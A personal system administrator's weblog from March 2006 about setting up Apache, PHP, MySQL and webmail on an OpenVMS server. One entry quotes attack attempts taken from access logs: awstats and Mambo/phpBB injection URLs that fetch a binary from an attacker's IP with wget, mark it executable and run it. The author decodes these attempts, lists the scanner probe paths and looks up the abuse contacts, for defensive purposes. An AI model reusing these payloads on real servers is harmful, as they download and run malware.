29-Mar-2006

Wordpress running
but with some troubles to be solved: http://www.grootersnet.nl/sysmgr/log/weblog/index.php contains some of them.

Weird place?
Perhaps; But this way most scripts will fail since it's not the default location.

But I will keep a stong eye on security!

28-Mar-2006

PHPMyAdmin works
That is: issue located and created a work-around: It's in the URL; that contains - in it's end - the string:
&collation_connection=utf8_unicode_ci
and that's just what give sthe error.
Changed that - in the browser address line - to read:
&collation_connection=utf8_general_ci
and behold: IT WORKS. No matter from where (Don't think you can access it - it's somewhere else ;-)
Switching time
this weekend has once again proved to be a non-issue.
Too busy with other things
but just this moring could watch the Apache logs. Found just two abuse attempts in ACCESS_LOG:

69.13.213.69 - - [22/Mar/2006:03:24:02 +0100]
GETs these URLs , at least: tries to (but gets 404-errors on each):

/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo/cgi-bin/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo

He's bsuy hacking his way in", because this is his command in plain text:

on "awstats" he does:

echo;
echo YYY;
cd /tmp;
wget 83.16.187.6/cacti;
chmod :x cacti;
./cacti;
echo YYY;
echo

on the other lines:

http://83.16.187.6/cmd.gif?&cmd=
cd /tmp;
wget 83.16.187.6/cacti;
chmod 744 cacti;
./cacti;
echo YYY;
echo

Actually the same.
Who is this:

The source is 69.13.213.69:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 69.13.0.0 - 69.13.255.255
CIDR: 69.13.0.0/16
NetName: CIHS
NetHandle: NET-69-13-0-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment:
RegDate: 2002-12-04
Updated: 2003-10-10

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

But he references 83.16.187.6 (in the URL) si I guess it's likely to be his "home address" :

inetnum: 83.16.187.4 - 83.16.187.7
netname: PRZEDSIBIORSTWOT
descr: PRZEDSIEBIORSTWO TELNET
descr: LOMZA
descr: POLAND
country: PL
admin-c: PZ823-RIPE
tech-c: TPHT
status: ASSIGNED PA
mnt-by: TPNET
source: RIPE # Filtered

role: TP S.A. Hostmaster
address: TP S.A. "POLPAK"
address: ul. Nowogrodzka 47A
address: 00-695 Warszawa
address: Poland
phone: +48 22 6252383
fax-no: +48 22 6225182
remarks: trouble: Network problems: hostmaster@tpnet.pl
remarks: trouble: Abuse and spam notification: abuse@tpnet.pl
remarks: trouble: DNS problems: dns@tpnet.pl
remarks: trouble: Routing problems: registry@tpnet.pl
admin-c: TK569-RIPE
tech-c: TK569-RIPE
tech-c: JS1838-RIPE
nic-hdl: TPHT
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
remarks: Please send spam and abuse notification only to abuse@tpnet.pl
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
mnt-by: TPNET
abuse-mailbox: abuse@tpnet.pl
source: RIPE # Filtered

Both will be notified.

The second is more straightforward - and a good proven NOT to install on default locations:

85.10.193.134 - - [26/Mar/2006:21:16:33 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 316

no, of course not. Nor do these:

/modules/newbb_plus/class/forumpollrenderer.php
/WebCalendar/tools/send_reminders.php
/webcalendar/tools/send_reminders.php
/cal/tools/send_reminders.php
/Calendar/tools/send_reminders.php
/calendar/tools/send_reminders.php
/protection.php
/modules/AllMyGuests/signin.php
/classes.php
/extensions/moblog/moblog_lib.php
/modules/newbb_plus/class/forumpollrenderer.php
/mambo/index2.php?option=com_content&do_pdf=1&id=1
/mambo/index.php?option=com_content&do_pdf=1&id=1
/index2.php?option=com_content&do_pdf=1&id=1
/index.php?option=com_content&do_pdf=1&id=1
/cvs/index2.php?option=com_content&do_pdf=1&id=1
/cvs/index.php?option=com_content&do_pdf=1&id=1
/modules/coppermine/themes/default/theme.php
/awstats.pl
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/html/xmlrpc.php

This source is:

inetnum: 85.10.192.0 - 85.10.207.255
netname: HETZNER-RZ-NBG-NET
descr: Hetzner Online AG
descr: Datacenter Nuernberg
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

role: Hetzner Online AG - Contact Role
address: Hetzner Online AG
address: Industriestr. 6
address: D-91710 Gunzenhausen
address: Germany
phone: +49 9831 61 00 61
fax-no: +49 9831 61 00 62
e-mail: ripe@hetzner.de
remarks: *************************************************
remarks: * For spam/abuse/security issues please contact *
remarks: * abuse@hetzner.de , not this address *
remarks: *************************************************

Again a notification to be sent.

25-Mar-2006

PHP applications
seem not to work fully. Ok, they get installed all right, protections are set, install scripts can be started and finish properly, the database schema is created, initialized and populated - but getting the application to really work in another issue. e107 simply fails to recognize index.php (page gaves 404 error but is IS there), and wordpress will not show up the text page since it cannot find a column.
Have to dig into that - and for security reasons, I disabled access to both E107 and Wordpress. (there may be known issues with e107 - the reference site has no more data after the last attempts)
phpadmin
works fine from Athene, but I still have trouble accessing the database from Diana itself, or Aphrodite. Don't know what it might be...
Switching to summertime tonight!

20-Mar-2006

MySQL issue?
Since MySQL seems to be up and running, and PHP is active already, the next step is obvious: management of the MySQL database using a PHP-based application - phpMyAdmin.
It runs on Athene already, to find out how it works, so on Diana I did the same: Got the latest version (2.8.0.2), and created a database schema (because there was a script to create a schema, and on Athene there is one as well).

It didn't work: no such user.

Rats - I should have read the installation manuals better on beforehand: I needed the user to be added in mysql. Did that, it accepted the username and password, but next signalled:

Client does not support authentication protocol requested by server; consider upgrading MySQL client

Ok, I know about that, I read about that on http://www.issinoho.com:8080/phpbb2/viewtopic.php?t=2

It seems that the latest PHP-on-VMS is built against an older MySQL version (3.x in stead against 4.0. Simple mismatch), but I can live with that - for the moment. (When will a new, really recent version of php_mysql be delivered, or is it available somewhere else?)

So I followed the advise, changed the password using OLD_PASSWORD, and retried, but got another surprising error:



MySQL's help wasn't very helpful either:



So I start searching and I found this string in some files within phpMyAdmin, and in the script creating the schema. Chnaged them to UTF8_bin - all - and recreated the database. No differece, but the same error mentioning utf8 now.

Reversed it all to the original, and behold:

I COULD LOG IN...

But the output was a bit different than I thought: I couldn't do on Diana what I can do on Athene (Ok, that one user MySQL5, but that's not a reason why I don't see the phpmyadmin database, cannot access mysql tables that I can see on Athene. Or is it?)

Anyway, I changed this user's privileges to be able to do everything from Diana's terminal, and started SWB to access phpMyAdmin again.

ALAS - the situation returned:

#1273 Unknown collation - utf8_unicode_ci

so back to the basic problem: something is definitely wrong. But the issue is how to get around this... (The same problem arises when accessing phpMyAdmin over the Internet)
Log cycle and publish
Log scan hasn't run last night - at least, it did run but didn't copy anything. Obvious - since the disk on which the webs are located has chnaged, I needed to adapt these procedures as well, and resubmitted. Secured the copies of apache's logs as well bij incorporating the version number in the filename so these would be unique and therefore cannot be purged away - and ran the copy-script and after that, recreated the index. See tomorrow if that's all done (Note: It is) so next to see how FTP can be handled likewise.

16-Mar-2006

Searching documents
For a project I'm looking for a way to easily search freetext in an application's documents (plain ASCII created on VMS) using a web interface. I found htdig via the Apache web pages at http://www.pdv-systeme.de/users/martinv/htdig/ and that proved very easy and good working (with some remarks - there are some wishes left, but these require some code changes in htsearch).
You can bet on it: once demonstrated, there came the request to include Microsft Word and PDF files as well. For that, I got the utilities to do that from the same site, installed them, pushed some Word documents and PDF files onto the VMS box and let the analysis-job run again.
Result: I could locate the Word documents using the search page! PDF files however, proved to be another matter. Digging through the logfile and the file contents in ASCII, I found that some are in PDF 1.0 format and these are fine (Great: the ones that worked were created on VMS using txt2pdf.exe by Craig Berry). But the ones I pushed (all PDF 1.3 created by a (Windowes based) java application) are not.
First impression was it was the conversion program, so I downloaded the lastest version of the retrieval conversion program used (pdftotext.exe) from http://frank.harvard.edu/~coldwell/vms/xpdf.html (pdftotext is part of the xpdf package), but the problem is elsewehere: the logfiles show the file is actually rertrieved but for some reason, not properly handled by the HTDIG program that does the retrieval.
Time to retrieve the (VMS) files and dig into it.
MySQL database
The database has been created! A few adaptions were made to the configuration file (the database is stored on another location than the default) and therefore I had to change the ownership of that location. Once that was done, it was a piece of cake!
Next task is to determine what software will be used for the new look-and-feel of the web(s)
Security
Funny thing found in operator.log:

%%%%%%%%%%% OPCOM 16-MAR-2006 21:13:03.24 %%%%%%%%%%%
Message from user TCPIP$SMTP on DIANA
TCPIP-W-SMTP_NOSPAMRLY, relay to <new_openrelay_test@internl.net>from client IP address 217.149.193.37 is suspected SPAM

This is my ISP testing the relay - to see whther it's an open one (not allowed) or not. Of course, it isn't.
They used to test regularly - but it has been suspended quite some time.
Other things found, wonder if that's to worry about:

%%%%%%%%%%% OPCOM 16-MAR-2006 21:16:55.42 %%%%%%%%%%%
Message from user TCPIP TELNET on DIANA
TELNET Logout Request from Remote Host: athene.intra.grootersnet.nl Port: 1143

%%%%%%%%%%% OPCOM 16-MAR-2006 21:17:12.19 %%%%%%%%%%%
Message from user INTERnet on DIANA
TELNET Login from Host: CERBEROS Port: 1192
...
%%%%%%%%%%% OPCOM 16-MAR-2006 22:22:02.97 %%%%%%%%%%%
Message from user TCPIP TELNET on DIANA
TELNET Logout Request from Remote Host: CERBEROS Port: 1192

I know I had opened a TELNET session on Athene using my access point, had a problem so logged out and in again. It seems that in some way, this is transferred to CERBEROS???
CERBEROS is the LINKSYS router and that has no TELNET software...
Mistake
I have two diskshelves connected to the HSZ50 but one of them doesn't contain production drives - so to save some power cost, I unplugged it.
Next, I made a mistake by hitting the reset button on the HSZ50. But Diana just signalled it lost connection to the system disk - and continues:

%%%%%%%%%%% OPCOM 16-MAR-2006 22:41:57.66 %%%%%%%%%%%
Device $116$DKA100: (DIANA PKB) is offline.
Mount verification is in progress.

%%%%%%%%%%% OPCOM 16-MAR-2006 22:41:57.68 %%%%%%%%%%%
Mount verification has completed for device $116$DKA100: (DIANA PKB)

This message occurred a number of times, but that was about it. No crash, no corruption....

15-Mar-2006

Finishing touch
on some management procedures, to copy and process logfiles. There were some changes that had to be incorporated, and assure the saving of old (and new) Apche logfiles. I kept all 1.3-1 files together in one archive directory and the 2.1 in the normal one - and chnaged the way they are copied. To assure the files are not purged away, the name must change when copying - similar to the operator logs. Well, this is just one command procedure that needs an adaption, so it's no big deal (it will also prevent zero-length files being copied - there is no need for these files)
MySQL
I installed MySQL - that is: ran the product instalation but still have to do the final part: creation of the database and preparing the use.
WEBMAIL matters
YAHMAIL has a problem. I can read messages but sending them is always failing for some reason: "Internal inconsistency error". No big deal, though, since it's successor (I have currently 0.4.1 in beta) is improving with each release; there are of course some issues, but these are fed beack to the author (Mark Daniel). Anyone wanting to give it a try: you can get it at http://wasd.vsm.com.au/wasd/.

14-Mar-2006

Mail is Ok
Got a message this morning form soyMail's author that the corruption message is to be ignored - the message was sent anyway.
Sent him a Dutch translation of the texts, there is a minor problem that some won't fit on the buttons, but he'll experiment to make it fit (enlarging the buttons, for instance)

The web page has a problem, which is easy to be solved: the counter's files are missing. A new version is available, so I will add that one.

13-Mar-2006

A final attempt?
Got the new soyMAIL version (0.4.1) and installed it. It works fine but sending attachement SEEM to fail: some corruption was signalled.
Rebooted using the HSZ50 - so the the new system disk, found some DECNet problems, to be expected since one of the NICs isn't connected yet and that signales a message in OPERATOR.LOG every 6 seconds or so. Disabled that intrteface - and DTSS since there is no need for DTSS since Diana's time is controlled by NTP and there is just this server.

Soymail is working fine now!

Prepared for the installation of the database software (MySQL, RdB) but time was running out, and I need to rethink the intended structure. Well, leave that for next time.

DIana is running on it's new system disk. See how everything goes!

12-Mar-2006

Well, NOT entirely satisfied
as was found that access from the internet was still a problem. No mail, no web access, just telnet would get through. As it turned out, it was the router that needed a change and reset. That was all - mail gets through now, as well as web requests and FTP connections.
Nevertheless - reversed anyway, since Yahmail couldn't send mail (Internal inconsistency error) and Soymail couldn't either because the return address was overwritten - Ok, still in Beta so it could be expected to contain an error. Informed the author - might be a bug. Will get the new version later thsi weekend.

11-Mar-2006

Moved the system
to boot from the shared disk. Well, it already did but the problem I still had was starting the new Apache version and keep all webs intact. Solving this required a minor adaption to the new Apache configuration file: I just copied all the virtual hosts from the 1.3 config file to the new (2.1) one, added the VMS authentication module and moved the includes for SSL, PHP, Perl and Tomcat to the right position - just in front of the virtual hosts.
Restarted it: Et voila!

Even better: Tomcat does start in batch! Great improvement.

The only thing that's now wrong is that specifying Diana as a host will cause the Apache page to show up, in stead of the normal entry. But that is just a minor issue - just removing the default DocumentRoot.

Another thing is that links to ScriptAlias'd directories seem to require a ".COM" extension. It broke both YAHMAIL and soyMail beta. Again, this is minor and can surely be solved in the configuration script.

This took about an hour, in all. Not bad.

Tested some issues with soymail that I had reported: mainly, the inability to upload files. That went Ok with this Apache version, it might be it's just an Apache 1.3 problem.

So far so good. Leave the system as it is now, and go on tomorrow!